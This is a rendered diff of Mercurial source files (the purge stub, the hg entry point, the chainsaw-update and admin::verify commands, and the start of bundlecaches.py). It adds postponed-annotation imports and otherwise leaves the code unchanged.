@@ -1,39 +1,42 | |||
|
1 | 1 | # Copyright (C) 2006 - Marco Barisione <marco@barisione.org> |
|
2 | 2 | # |
|
3 | 3 | # This is a small extension for Mercurial (https://mercurial-scm.org/) |
|
4 | 4 | # that removes files not known to mercurial |
|
5 | 5 | # |
|
6 | 6 | # This program was inspired by the "cvspurge" script contained in CVS |
|
7 | 7 | # utilities (http://www.red-bean.com/cvsutils/). |
|
8 | 8 | # |
|
9 | 9 | # For help on the usage of "hg purge" use: |
|
10 | 10 | # hg help purge |
|
11 | 11 | # |
|
12 | 12 | # This program is free software; you can redistribute it and/or modify |
|
13 | 13 | # it under the terms of the GNU General Public License as published by |
|
14 | 14 | # the Free Software Foundation; either version 2 of the License, or |
|
15 | 15 | # (at your option) any later version. |
|
16 | 16 | # |
|
17 | 17 | # This program is distributed in the hope that it will be useful, |
|
18 | 18 | # but WITHOUT ANY WARRANTY; without even the implied warranty of |
|
19 | 19 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
|
20 | 20 | # GNU General Public License for more details. |
|
21 | 21 | # |
|
22 | 22 | # You should have received a copy of the GNU General Public License |
|
23 | 23 | # along with this program; if not, see <http://www.gnu.org/licenses/>. |
|
24 | 24 | |
|
25 | 25 | '''command to delete untracked files from the working directory (DEPRECATED) |
|
26 | 26 | |
|
27 | 27 | The functionality of this extension has been included in core Mercurial since |
|
28 | 28 | version 5.7. Please use :hg:`purge ...` instead. :hg:`purge --confirm` is now |
|
29 | 29 | the default, unless the extension is enabled for backward compatibility. |
|
30 | 30 | ''' |
|
31 | 31 | |
|
32 | 32 | # This empty extension looks pointless, but core mercurial checks if it's loaded |
|
33 | 33 | # to implement the slightly different behavior documented above. |
|
34 | 34 | |
|
35 | 35 | # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for |
|
36 | 36 | # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should |
|
37 | 37 | # be specifying the version(s) of Mercurial they are tested with, or |
|
38 | 38 | # leave the attribute unspecified. |
|
39 | ||
|
40 | from __future__ import annotations | |
|
41 | ||
|
39 | 42 | testedwith = b'ships-with-hg-core' |
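To illustrate the note above for extension authors: a non-mainline extension would declare the versions it was actually tested with rather than 'ships-with-hg-core'. A minimal sketch follows; the version string and issue-tracker URL are assumptions for illustration only, not part of this change.

    # Hypothetical third-party extension metadata (values assumed):
    testedwith = b'6.7 6.8'  # Mercurial versions the extension was tested with
    buglink = b'https://example.org/myext/issues'  # where to report problems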
@@ -1,12 +1,15 | |||
|
1 | from __future__ import annotations | |
|
2 | ||
|
3 | ||
|
1 | 4 | def run(): |
|
2 | 5 | from . import demandimport |
|
3 | 6 | |
|
4 | 7 | with demandimport.tracing.log('hg script'): |
|
5 | 8 | demandimport.enable() |
|
6 | 9 | from . import dispatch |
|
7 | 10 | |
|
8 | 11 | dispatch.run() |
|
9 | 12 | |
|
10 | 13 | |
|
11 | 14 | if __name__ == '__main__': |
|
12 | 15 | run() |
@@ -1,226 +1,228 | |||
|
1 | 1 | # chainsaw.py |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2022 Georges Racinet <georges.racinet@octobus.net> |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | 7 | """chainsaw is a collection of single-minded and dangerous tools. (EXPERIMENTAL) |
|
8 | 8 | |
|
9 | 9 | "Don't use a chainsaw to cut your food!" |
|
10 | 10 | |
|
11 | 11 | The chainsaw is a collection of commands that are so heavily geared towards a |
|
12 | 12 | specific use case in a specific context or environment that they are totally |
|
13 | 13 | inappropriate and **really dangerous** in other contexts. |
|
14 | 14 | |
|
15 | 15 | The help text of each command explicitly summarizes its context of application |
|
16 | 16 | and the wanted end result. |
|
17 | 17 | |
|
18 | 18 | It is recommended to run these commands with the ``HGPLAIN`` environment |
|
19 | 19 | variable (see :hg:`help scripting`). |
|
20 | 20 | """ |
|
21 | 21 | |
|
22 | from __future__ import annotations | |
|
23 | ||
|
22 | 24 | import shutil |
|
23 | 25 | |
|
24 | 26 | from ..i18n import _ |
|
25 | 27 | from .. import ( |
|
26 | 28 | cmdutil, |
|
27 | 29 | commands, |
|
28 | 30 | error, |
|
29 | 31 | localrepo, |
|
30 | 32 | registrar, |
|
31 | 33 | ) |
|
32 | 34 | from ..utils import ( |
|
33 | 35 | urlutil, |
|
34 | 36 | ) |
|
35 | 37 | |
|
36 | 38 | cmdtable = {} |
|
37 | 39 | command = registrar.command(cmdtable) |
|
38 | 40 | |
|
39 | 41 | |
|
40 | 42 | @command( |
|
41 | 43 | b'admin::chainsaw-update', |
|
42 | 44 | [ |
|
43 | 45 | ( |
|
44 | 46 | b'', |
|
45 | 47 | b'purge-unknown', |
|
46 | 48 | True, |
|
47 | 49 | _( |
|
48 | 50 | b'Remove unversioned files before update. Disabling this can ' |
|
49 | 51 | b'in some cases interfere with the update. ' |
|
50 | 52 | b'See also :hg:`purge`.' |
|
51 | 53 | ), |
|
52 | 54 | ), |
|
53 | 55 | ( |
|
54 | 56 | b'', |
|
55 | 57 | b'purge-ignored', |
|
56 | 58 | True, |
|
57 | 59 | _( |
|
58 | 60 | b'Remove ignored files before update. Disable this for ' |
|
59 | 61 | b'instance to reuse previous compiler object files. ' |
|
60 | 62 | b'See also :hg:`purge`.' |
|
61 | 63 | ), |
|
62 | 64 | ), |
|
63 | 65 | ( |
|
64 | 66 | b'', |
|
65 | 67 | b'rev', |
|
66 | 68 | b'', |
|
67 | 69 | _(b'revision to update to'), |
|
68 | 70 | ), |
|
69 | 71 | ( |
|
70 | 72 | b'', |
|
71 | 73 | b'source', |
|
72 | 74 | b'', |
|
73 | 75 | _(b'repository to clone from'), |
|
74 | 76 | ), |
|
75 | 77 | ( |
|
76 | 78 | b'', |
|
77 | 79 | b'dest', |
|
78 | 80 | b'', |
|
79 | 81 | _(b'repository to update to REV (possibly cloning)'), |
|
80 | 82 | ), |
|
81 | 83 | ( |
|
82 | 84 | b'', |
|
83 | 85 | b'initial-clone-minimal', |
|
84 | 86 | False, |
|
85 | 87 | _( |
|
86 | 88 | b'Pull only the prescribed revision upon initial cloning. ' |
|
87 | 89 | b'This has the side effect of ignoring clone-bundles, ' |
|
88 | 90 | b'which is often slower on the client side and more stressful ' |
|
89 | 91 | b'to the server than applying available clone bundles.' |
|
90 | 92 | ), |
|
91 | 93 | ), |
|
92 | 94 | ], |
|
93 | 95 | _( |
|
94 | 96 | b'hg admin::chainsaw-update [OPTION] --rev REV --source SOURCE --dest DEST' |
|
95 | 97 | ), |
|
96 | 98 | helpbasic=True, |
|
97 | 99 | norepo=True, |
|
98 | 100 | ) |
|
99 | 101 | def update(ui, **opts): |
|
100 | 102 | """pull and update to a given revision, no matter what, (EXPERIMENTAL) |
|
101 | 103 | |
|
102 | 104 | Context of application: *some* Continuous Integration (CI) systems, |
|
103 | 105 | packaging or deployment tools. |
|
104 | 106 | |
|
105 | 107 | Wanted end result: local repository at the given REPO_PATH, having the |
|
106 | 108 | latest changes to the given revision and with a clean working directory |
|
107 | 109 | updated at the given revision. |
|
108 | 110 | |
|
109 | 111 | chainsaw-update pulls from one source, then updates the working directory |
|
110 | 112 | to the given revision, overcoming anything that would stand in the way. |
|
111 | 113 | |
|
112 | 114 | By default, it will: |
|
113 | 115 | |
|
114 | 116 | - clone if the local repo does not exist yet, **removing any directory |
|
115 | 117 | at the given path** that would not be a Mercurial repository. |
|
116 | 118 | The initial clone is full by default, so that clonebundles can be |
|
117 | 119 | applied. Use the --initial-clone-minimal flag to avoid this. |
|
118 | 120 | - break locks if needed, leading to possible corruption if there |
|
119 | 121 | is a concurrent write access. |
|
120 | 122 | - perform recovery actions if needed |
|
121 | 123 | - revert any local modification. |
|
122 | 124 | - purge unknown and ignored files. |
|
123 | 125 | - go as far as to reclone if everything else failed (not implemented yet). |
|
124 | 126 | |
|
125 | 127 | DO NOT use it for anything other than performing a series |
|
126 | 128 | of unattended updates, with full exclusive repository access each time |
|
127 | 129 | and without any other local work than running build scripts. |
|
128 | 130 | In case the local repository is a share (see :hg:`help share`), exclusive |
|
129 | 131 | write access to the share source is also mandatory. |
|
130 | 132 | |
|
131 | 133 | It is recommended to run these commands with the ``HGPLAIN`` environment |
|
132 | 134 | variable (see :hg:`help scripting`). |
|
133 | 135 | |
|
134 | 136 | Motivation: in Continuous Integration and Delivery systems (CI/CD), the |
|
135 | 137 | occasional remnant or bogus locks are a common source of wasted time (both |
|
136 | 138 | working time and calendar time). CI/CD scripts tend to grow with counter- |
|
137 | 139 | measures, often added in a hurry. Also, whilst it is neat to keep |
|
138 | 140 | repositories from one job to the next (especially with large |
|
139 | 141 | repositories), an exceptional recloning is better than missing a release |
|
140 | 142 | deadline. |
|
141 | 143 | """ |
|
142 | 144 | rev = opts['rev'] |
|
143 | 145 | source = opts['source'] |
|
144 | 146 | repo_path = opts['dest'] |
|
145 | 147 | if not rev: |
|
146 | 148 | raise error.InputError(_(b'specify a target revision with --rev')) |
|
147 | 149 | if not source: |
|
148 | 150 | raise error.InputError(_(b'specify a pull path with --source')) |
|
149 | 151 | if not repo_path: |
|
150 | 152 | raise error.InputError(_(b'specify a repo path with --dest')) |
|
151 | 153 | repo_path = urlutil.urllocalpath(repo_path) |
|
152 | 154 | |
|
153 | 155 | try: |
|
154 | 156 | repo = localrepo.instance(ui, repo_path, create=False) |
|
155 | 157 | repo_created = False |
|
156 | 158 | ui.status(_(b'loaded repository at "%s"\n' % repo_path)) |
|
157 | 159 | except error.RepoError: |
|
158 | 160 | try: |
|
159 | 161 | shutil.rmtree(repo_path) |
|
160 | 162 | except FileNotFoundError: |
|
161 | 163 | ui.status(_(b'no such directory: "%s"\n' % repo_path)) |
|
162 | 164 | else: |
|
163 | 165 | ui.status( |
|
164 | 166 | _( |
|
165 | 167 | b'removed non-repository file or directory ' |
|
166 | 168 | b'at "%s"' % repo_path |
|
167 | 169 | ) |
|
168 | 170 | ) |
|
169 | 171 | |
|
170 | 172 | ui.status(_(b'creating repository at "%s"\n' % repo_path)) |
|
171 | 173 | repo = localrepo.instance(ui, repo_path, create=True) |
|
172 | 174 | repo_created = True |
|
173 | 175 | |
|
174 | 176 | if repo.svfs.tryunlink(b'lock'): |
|
175 | 177 | ui.status(_(b'had to break store lock\n')) |
|
176 | 178 | if repo.vfs.tryunlink(b'wlock'): |
|
177 | 179 | ui.status(_(b'had to break working copy lock\n')) |
|
178 | 180 | # If another process relocks after the breaking above, the next locking |
|
179 | 181 | # will have to wait. |
|
180 | 182 | with repo.wlock(), repo.lock(): |
|
181 | 183 | ui.status(_(b'recovering after interrupted transaction, if any\n')) |
|
182 | 184 | repo.recover() |
|
183 | 185 | |
|
184 | 186 | ui.status(_(b'pulling from %s\n') % source) |
|
185 | 187 | if repo_created and not opts.get('initial_clone_minimal'): |
|
186 | 188 | pull_revs = [] |
|
187 | 189 | else: |
|
188 | 190 | pull_revs = [rev] |
|
189 | 191 | overrides = {(b'ui', b'quiet'): True} |
|
190 | 192 | with repo.ui.configoverride(overrides, b'chainsaw-update'): |
|
191 | 193 | pull = cmdutil.findcmd(b'pull', commands.table)[1][0] |
|
192 | 194 | ret = pull( |
|
193 | 195 | repo.ui, |
|
194 | 196 | repo, |
|
195 | 197 | source, |
|
196 | 198 | rev=pull_revs, |
|
197 | 199 | remote_hidden=False, |
|
198 | 200 | ) |
|
199 | 201 | if ret: |
|
200 | 202 | return ret |
|
201 | 203 | |
|
202 | 204 | purge = cmdutil.findcmd(b'purge', commands.table)[1][0] |
|
203 | 205 | ret = purge( |
|
204 | 206 | ui, |
|
205 | 207 | repo, |
|
206 | 208 | dirs=True, |
|
207 | 209 | all=opts.get('purge_ignored'), |
|
208 | 210 | files=opts.get('purge_unknown'), |
|
209 | 211 | confirm=False, |
|
210 | 212 | ) |
|
211 | 213 | if ret: |
|
212 | 214 | return ret |
|
213 | 215 | |
|
214 | 216 | ui.status(_(b'updating to revision \'%s\'\n') % rev) |
|
215 | 217 | update = cmdutil.findcmd(b'update', commands.table)[1][0] |
|
216 | 218 | ret = update(ui, repo, rev=rev, clean=True) |
|
217 | 219 | if ret: |
|
218 | 220 | return ret |
|
219 | 221 | |
|
220 | 222 | ui.status( |
|
221 | 223 | _( |
|
222 | 224 | b'chainsaw-update to revision \'%s\' ' |
|
223 | 225 | b'for repository at \'%s\' done\n' |
|
224 | 226 | ) |
|
225 | 227 | % (rev, repo.root) |
|
226 | 228 | ) |
@@ -1,340 +1,342 | |||
|
1 | 1 | # admin/verify.py - better repository integrity checking for Mercurial |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2023 Octobus <contact@octobus.net> |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | 7 | |
|
8 | from __future__ import annotations | |
|
9 | ||
|
8 | 10 | import collections |
|
9 | 11 | import copy |
|
10 | 12 | import functools |
|
11 | 13 | |
|
12 | 14 | from ..i18n import _ |
|
13 | 15 | from .. import error, pycompat, registrar, requirements |
|
14 | 16 | from ..utils import stringutil |
|
15 | 17 | |
|
16 | 18 | |
|
17 | 19 | verify_table = {} |
|
18 | 20 | verify_alias_table = {} |
|
19 | 21 | check = registrar.verify_check(verify_table, verify_alias_table) |
|
20 | 22 | |
|
21 | 23 | |
|
22 | 24 | # Use this to declare options/aliases in the middle of the hierarchy. |
|
23 | 25 | # Checks like these are not run themselves and cannot have a body. |
|
24 | 26 | # For an example, see the `revlogs` check. |
|
25 | 27 | def noop_func(*args, **kwargs): |
|
26 | 28 | return |
|
27 | 29 | |
|
28 | 30 | |
|
29 | 31 | @check(b"working-copy.dirstate", alias=b"dirstate") |
|
30 | 32 | def check_dirstate(ui, repo, **options): |
|
31 | 33 | ui.status(_(b"checking dirstate\n")) |
|
32 | 34 | |
|
33 | 35 | parent1, parent2 = repo.dirstate.parents() |
|
34 | 36 | m1 = repo[parent1].manifest() |
|
35 | 37 | m2 = repo[parent2].manifest() |
|
36 | 38 | errors = 0 |
|
37 | 39 | |
|
38 | 40 | is_narrow = requirements.NARROW_REQUIREMENT in repo.requirements |
|
39 | 41 | narrow_matcher = repo.narrowmatch() if is_narrow else None |
|
40 | 42 | for err in repo.dirstate.verify(m1, m2, parent1, narrow_matcher): |
|
41 | 43 | ui.warn(err) |
|
42 | 44 | errors += 1 |
|
43 | 45 | |
|
44 | 46 | return errors |
|
45 | 47 | |
|
46 | 48 | |
|
47 | 49 | # Tree of all checks and their associated function |
|
48 | 50 | pyramid = {} |
|
49 | 51 | |
|
50 | 52 | |
|
51 | 53 | def build_pyramid(table, full_pyramid): |
|
52 | 54 | """Create a pyramid of checks of the registered checks. |
|
53 | 55 | It is a name-based hierarchy that can be arbitrarily nested.""" |
|
54 | 56 | for entry, func in sorted(table.items(), key=lambda x: x[0], reverse=True): |
|
55 | 57 | cursor = full_pyramid |
|
56 | 58 | levels = entry.split(b".") |
|
57 | 59 | for level in levels[:-1]: |
|
58 | 60 | current_node = cursor.setdefault(level, {}) |
|
59 | 61 | cursor = current_node |
|
60 | 62 | if cursor.get(levels[-1]) is None: |
|
61 | 63 | cursor[levels[-1]] = (entry, func) |
|
62 | 64 | elif func is not noop_func: |
|
63 | 65 | m = b"intermediate checks need to use `verify.noop_func`" |
|
64 | 66 | raise error.ProgrammingError(m) |
|
65 | 67 | |
|
66 | 68 | |
|
67 | 69 | def find_checks(name, table=None, alias_table=None, full_pyramid=None): |
|
68 | 70 | """Find all checks for a given name and returns a dict of |
|
69 | 71 | (qualified_check_name, check_function) |
|
70 | 72 | |
|
71 | 73 | # Examples |
|
72 | 74 | |
|
73 | 75 | Using a full qualified name: |
|
74 | 76 | "working-copy.dirstate" -> { |
|
75 | 77 | "working-copy.dirstate": CF, |
|
76 | 78 | } |
|
77 | 79 | |
|
78 | 80 | Using a *prefix* of a qualified name: |
|
79 | 81 | "store.revlogs" -> { |
|
80 | 82 | "store.revlogs.changelog": CF, |
|
81 | 83 | "store.revlogs.manifestlog": CF, |
|
82 | 84 | "store.revlogs.filelog": CF, |
|
83 | 85 | } |
|
84 | 86 | |
|
85 | 87 | Using a defined alias: |
|
86 | 88 | "revlogs" -> { |
|
87 | 89 | "store.revlogs.changelog": CF, |
|
88 | 90 | "store.revlogs.manifestlog": CF, |
|
89 | 91 | "store.revlogs.filelog": CF, |
|
90 | 92 | } |
|
91 | 93 | |
|
92 | 94 | Using something that is none of the above will be an error. |
|
93 | 95 | """ |
|
94 | 96 | if table is None: |
|
95 | 97 | table = verify_table |
|
96 | 98 | if alias_table is None: |
|
97 | 99 | alias_table = verify_alias_table |
|
98 | 100 | |
|
99 | 101 | if name == b"full": |
|
100 | 102 | return table |
|
101 | 103 | checks = {} |
|
102 | 104 | |
|
103 | 105 | # is it a full name? |
|
104 | 106 | check = table.get(name) |
|
105 | 107 | |
|
106 | 108 | if check is None: |
|
107 | 109 | # is it an alias? |
|
108 | 110 | qualified_name = alias_table.get(name) |
|
109 | 111 | if qualified_name is not None: |
|
110 | 112 | name = qualified_name |
|
111 | 113 | check = table.get(name) |
|
112 | 114 | else: |
|
113 | 115 | split = name.split(b".", 1) |
|
114 | 116 | if len(split) == 2: |
|
115 | 117 | # split[0] can be an alias |
|
116 | 118 | qualified_name = alias_table.get(split[0]) |
|
117 | 119 | if qualified_name is not None: |
|
118 | 120 | name = b"%s.%s" % (qualified_name, split[1]) |
|
119 | 121 | check = table.get(name) |
|
120 | 122 | else: |
|
121 | 123 | qualified_name = name |
|
122 | 124 | |
|
123 | 125 | # Maybe it's a subtree in the check hierarchy that does not |
|
124 | 126 | # have an explicit alias. |
|
125 | 127 | levels = name.split(b".") |
|
126 | 128 | if full_pyramid is not None: |
|
127 | 129 | if not full_pyramid: |
|
128 | 130 | build_pyramid(table, full_pyramid) |
|
129 | 131 | |
|
130 | 132 | pyramid.clear() |
|
131 | 133 | pyramid.update(full_pyramid.items()) |
|
132 | 134 | else: |
|
133 | 135 | build_pyramid(table, pyramid) |
|
134 | 136 | |
|
135 | 137 | subtree = pyramid |
|
136 | 138 | # Find subtree |
|
137 | 139 | for level in levels: |
|
138 | 140 | subtree = subtree.get(level) |
|
139 | 141 | if subtree is None: |
|
140 | 142 | hint = error.getsimilar(list(alias_table) + list(table), name) |
|
141 | 143 | hint = error.similarity_hint(hint) |
|
142 | 144 | |
|
143 | 145 | raise error.InputError(_(b"unknown check %s" % name), hint=hint) |
|
144 | 146 | |
|
145 | 147 | # Get all checks in that subtree |
|
146 | 148 | if isinstance(subtree, dict): |
|
147 | 149 | stack = list(subtree.items()) |
|
148 | 150 | while stack: |
|
149 | 151 | current_name, entry = stack.pop() |
|
150 | 152 | if isinstance(entry, dict): |
|
151 | 153 | stack.extend(entry.items()) |
|
152 | 154 | else: |
|
153 | 155 | # (qualified_name, func) |
|
154 | 156 | checks[entry[0]] = entry[1] |
|
155 | 157 | else: |
|
156 | 158 | checks[name] = check |
|
157 | 159 | |
|
158 | 160 | return checks |
|
159 | 161 | |
|
160 | 162 | |
|
161 | 163 | def pass_options( |
|
162 | 164 | ui, |
|
163 | 165 | checks, |
|
164 | 166 | options, |
|
165 | 167 | table=None, |
|
166 | 168 | alias_table=None, |
|
167 | 169 | full_pyramid=None, |
|
168 | 170 | ): |
|
169 | 171 | """Given a dict of checks (fully qualified name to function), and a list |
|
170 | 172 | of options as given by the user, pass each option down to the right check |
|
171 | 173 | function.""" |
|
172 | 174 | ui.debug(b"passing options to check functions\n") |
|
173 | 175 | to_modify = collections.defaultdict(dict) |
|
174 | 176 | |
|
175 | 177 | if not checks: |
|
176 | 178 | raise error.Error(_(b"`checks` required")) |
|
177 | 179 | |
|
178 | 180 | for option in sorted(options): |
|
179 | 181 | split = option.split(b":") |
|
180 | 182 | hint = _( |
|
181 | 183 | b"syntax is 'check:option=value', " |
|
182 | 184 | b"eg. revlogs.changelog:copies=yes" |
|
183 | 185 | ) |
|
184 | 186 | option_error = error.InputError( |
|
185 | 187 | _(b"invalid option '%s'") % option, hint=hint |
|
186 | 188 | ) |
|
187 | 189 | if len(split) != 2: |
|
188 | 190 | raise option_error |
|
189 | 191 | |
|
190 | 192 | check_name, option_value = split |
|
191 | 193 | if not option_value: |
|
192 | 194 | raise option_error |
|
193 | 195 | |
|
194 | 196 | split = option_value.split(b"=") |
|
195 | 197 | if len(split) != 2: |
|
196 | 198 | raise option_error |
|
197 | 199 | |
|
198 | 200 | option_name, value = split |
|
199 | 201 | if not value: |
|
200 | 202 | raise option_error |
|
201 | 203 | |
|
202 | 204 | path = b"%s:%s" % (check_name, option_name) |
|
203 | 205 | |
|
204 | 206 | matching_checks = find_checks( |
|
205 | 207 | check_name, |
|
206 | 208 | table=table, |
|
207 | 209 | alias_table=alias_table, |
|
208 | 210 | full_pyramid=full_pyramid, |
|
209 | 211 | ) |
|
210 | 212 | for name in matching_checks: |
|
211 | 213 | check = checks.get(name) |
|
212 | 214 | if check is None: |
|
213 | 215 | msg = _(b"specified option '%s' for unselected check '%s'\n") |
|
214 | 216 | raise error.InputError(msg % (option_name, name)) |
|
215 | 217 | |
|
216 | 218 | assert hasattr(check, "func") # help Pytype |
|
217 | 219 | |
|
218 | 220 | if not hasattr(check.func, "options"): |
|
219 | 221 | raise error.InputError( |
|
220 | 222 | _(b"check '%s' has no option '%s'") % (name, option_name) |
|
221 | 223 | ) |
|
222 | 224 | |
|
223 | 225 | try: |
|
224 | 226 | matching_option = next( |
|
225 | 227 | (o for o in check.func.options if o[0] == option_name) |
|
226 | 228 | ) |
|
227 | 229 | except StopIteration: |
|
228 | 230 | raise error.InputError( |
|
229 | 231 | _(b"check '%s' has no option '%s'") % (name, option_name) |
|
230 | 232 | ) |
|
231 | 233 | |
|
232 | 234 | # transform the argument from cli string to the expected Python type |
|
233 | 235 | _name, typ, _docstring = matching_option |
|
234 | 236 | |
|
235 | 237 | as_typed = None |
|
236 | 238 | if isinstance(typ, bool): |
|
237 | 239 | as_bool = stringutil.parsebool(value) |
|
238 | 240 | if as_bool is None: |
|
239 | 241 | raise error.InputError( |
|
240 | 242 | _(b"'%s' is not a boolean ('%s')") % (path, value) |
|
241 | 243 | ) |
|
242 | 244 | as_typed = as_bool |
|
243 | 245 | elif isinstance(typ, list): |
|
244 | 246 | as_list = stringutil.parselist(value) |
|
245 | 247 | if as_list is None: |
|
246 | 248 | raise error.InputError( |
|
247 | 249 | _(b"'%s' is not a list ('%s')") % (path, value) |
|
248 | 250 | ) |
|
249 | 251 | as_typed = as_list |
|
250 | 252 | else: |
|
251 | 253 | raise error.ProgrammingError(b"unsupported type %s", type(typ)) |
|
252 | 254 | |
|
253 | 255 | if option_name in to_modify[name]: |
|
254 | 256 | raise error.InputError( |
|
255 | 257 | _(b"duplicated option '%s' for '%s'") % (option_name, name) |
|
256 | 258 | ) |
|
257 | 259 | else: |
|
258 | 260 | assert as_typed is not None |
|
259 | 261 | to_modify[name][option_name] = as_typed |
|
260 | 262 | |
|
261 | 263 | # Handle the case where a check is selected but given no command line options; |
|
262 | 264 | # it will later be run with the default check option values |
|
263 | 265 | for name, f in checks.items(): |
|
264 | 266 | if name not in to_modify: |
|
265 | 267 | to_modify[name] = {} |
|
266 | 268 | |
|
267 | 269 | # Merge default options with command line options |
|
268 | 270 | for check_name, cmd_options in to_modify.items(): |
|
269 | 271 | check = checks.get(check_name) |
|
270 | 272 | func = checks[check_name] |
|
271 | 273 | merged_options = {} |
|
272 | 274 | # help Pytype |
|
273 | 275 | assert check is not None |
|
274 | 276 | assert check.func is not None |
|
275 | 277 | assert hasattr(check.func, "options") |
|
276 | 278 | |
|
277 | 279 | if check.func.options: |
|
278 | 280 | # copy the default value in case it's mutable (list, etc.) |
|
279 | 281 | merged_options = { |
|
280 | 282 | o[0]: copy.deepcopy(o[1]) for o in check.func.options |
|
281 | 283 | } |
|
282 | 284 | if cmd_options: |
|
283 | 285 | for k, v in cmd_options.items(): |
|
284 | 286 | merged_options[k] = v |
|
285 | 287 | options = pycompat.strkwargs(merged_options) |
|
286 | 288 | checks[check_name] = functools.partial(func, **options) |
|
287 | 289 | ui.debug(b"merged options for '%s': '%r'\n" % (check_name, options)) |
|
288 | 290 | |
|
289 | 291 | return checks |
|
290 | 292 | |
|
291 | 293 | |
|
292 | 294 | def get_checks( |
|
293 | 295 | repo, |
|
294 | 296 | ui, |
|
295 | 297 | names=None, |
|
296 | 298 | options=None, |
|
297 | 299 | table=None, |
|
298 | 300 | alias_table=None, |
|
299 | 301 | full_pyramid=None, |
|
300 | 302 | ): |
|
301 | 303 | """Given a list of function names and optionally a list of |
|
302 | 304 | options, return matched checks with merged options (command line options |
|
303 | 305 | values take precedence on default ones) |
|
304 | 306 | |
|
305 | 307 | It runs find checks, then resolve options and returns a dict of matched |
|
306 | 308 | functions with resolved options. |
|
307 | 309 | """ |
|
308 | 310 | funcs = {} |
|
309 | 311 | |
|
310 | 312 | if names is None: |
|
311 | 313 | names = [] |
|
312 | 314 | |
|
313 | 315 | if options is None: |
|
314 | 316 | options = [] |
|
315 | 317 | |
|
316 | 318 | # find checks |
|
317 | 319 | for name in names: |
|
318 | 320 | matched = find_checks( |
|
319 | 321 | name, |
|
320 | 322 | table=table, |
|
321 | 323 | alias_table=alias_table, |
|
322 | 324 | full_pyramid=full_pyramid, |
|
323 | 325 | ) |
|
324 | 326 | matched_names = b", ".join(matched) |
|
325 | 327 | ui.debug(b"found checks '%s' for name '%s'\n" % (matched_names, name)) |
|
326 | 328 | funcs.update(matched) |
|
327 | 329 | |
|
328 | 330 | funcs = {n: functools.partial(f, ui, repo) for n, f in funcs.items()} |
|
329 | 331 | |
|
330 | 332 | # resolve options |
|
331 | 333 | checks = pass_options( |
|
332 | 334 | ui, |
|
333 | 335 | funcs, |
|
334 | 336 | options, |
|
335 | 337 | table=table, |
|
336 | 338 | alias_table=alias_table, |
|
337 | 339 | full_pyramid=full_pyramid, |
|
338 | 340 | ) |
|
339 | 341 | |
|
340 | 342 | return checks |
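A small usage sketch, grounded only in the name-resolution examples from the find_checks docstring above; the ui and repo objects are assumed to come from the caller, as in the admin::verify command that consumes this module.

    # Resolve the 'dirstate' alias to 'working-copy.dirstate', merge in the
    # default options, then run each selected check.
    funcs = get_checks(repo, ui, names=[b"dirstate"], options=[])
    for name, func in sorted(funcs.items()):
        errors = func()
        if errors:
            ui.warn(b"found %d errors in %s\n" % (errors, name))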
@@ -1,50 +1,52 | |||
|
1 | 1 | # admin_commands.py - command processing for admin* commands |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2022 Mercurial Developers |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | 7 | |
|
8 | from __future__ import annotations | |
|
9 | ||
|
8 | 10 | from .i18n import _ |
|
9 | 11 | from .admin import chainsaw, verify |
|
10 | 12 | from . import error, registrar, transaction |
|
11 | 13 | |
|
12 | 14 | |
|
13 | 15 | table = {} |
|
14 | 16 | table.update(chainsaw.command._table) |
|
15 | 17 | command = registrar.command(table) |
|
16 | 18 | |
|
17 | 19 | |
|
18 | 20 | @command( |
|
19 | 21 | b'admin::verify', |
|
20 | 22 | [ |
|
21 | 23 | (b'c', b'check', [], _(b'add a check'), _(b'CHECK')), |
|
22 | 24 | (b'o', b'option', [], _(b'pass an option to a check'), _(b'OPTION')), |
|
23 | 25 | ], |
|
24 | 26 | helpcategory=command.CATEGORY_MAINTENANCE, |
|
25 | 27 | ) |
|
26 | 28 | def admin_verify(ui, repo, **opts): |
|
27 | 29 | """verify the integrity of the repository |
|
28 | 30 | |
|
29 | 31 | Alternative UI to `hg verify` with a lot more control over the |
|
30 | 32 | verification process and better error reporting. |
|
31 | 33 | """ |
|
32 | 34 | |
|
33 | 35 | if not repo.url().startswith(b'file:'): |
|
34 | 36 | raise error.Abort(_(b"cannot verify bundle or remote repos")) |
|
35 | 37 | |
|
36 | 38 | if transaction.has_abandoned_transaction(repo): |
|
37 | 39 | ui.warn(_(b"abandoned transaction found - run hg recover\n")) |
|
38 | 40 | |
|
39 | 41 | checks = opts.get("check", []) |
|
40 | 42 | options = opts.get("option", []) |
|
41 | 43 | |
|
42 | 44 | funcs = verify.get_checks(repo, ui, names=checks, options=options) |
|
43 | 45 | |
|
44 | 46 | ui.status(_(b"running %d checks\n") % len(funcs)) |
|
45 | 47 | # Done in two steps so that execution is separated from the resolving step |
|
46 | 48 | for name, func in sorted(funcs.items(), key=lambda x: x[0]): |
|
47 | 49 | ui.status(_(b"running %s\n") % name) |
|
48 | 50 | errors = func() |
|
49 | 51 | if errors: |
|
50 | 52 | ui.warn(_(b"found %d errors\n") % errors) |
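For illustration, the --check/--option flags above map directly onto verify.get_checks(); a hedged sketch using the 'check:option=value' syntax quoted in pass_options (the specific check and option names are taken from that hint and may not exist in every build):

    # Roughly what `hg admin::verify -c revlogs -o revlogs.changelog:copies=yes`
    # resolves to before the checks are executed.
    funcs = verify.get_checks(
        repo,
        ui,
        names=[b'revlogs'],
        options=[b'revlogs.changelog:copies=yes'],
    )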
@@ -1,568 +1,570 | |||
|
1 | 1 | # bundlecaches.py - utility to deal with pre-computed bundle for servers |
|
2 | 2 | # |
|
3 | 3 | # This software may be used and distributed according to the terms of the |
|
4 | 4 | # GNU General Public License version 2 or any later version. |
|
5 | 5 | |
|
6 | from __future__ import annotations | |
|
7 | ||
|
6 | 8 | import collections |
|
7 | 9 | import typing |
|
8 | 10 | |
|
9 | 11 | from typing import ( |
|
10 | 12 | Dict, |
|
11 | 13 | Union, |
|
12 | 14 | cast, |
|
13 | 15 | ) |
|
14 | 16 | |
|
15 | 17 | from .i18n import _ |
|
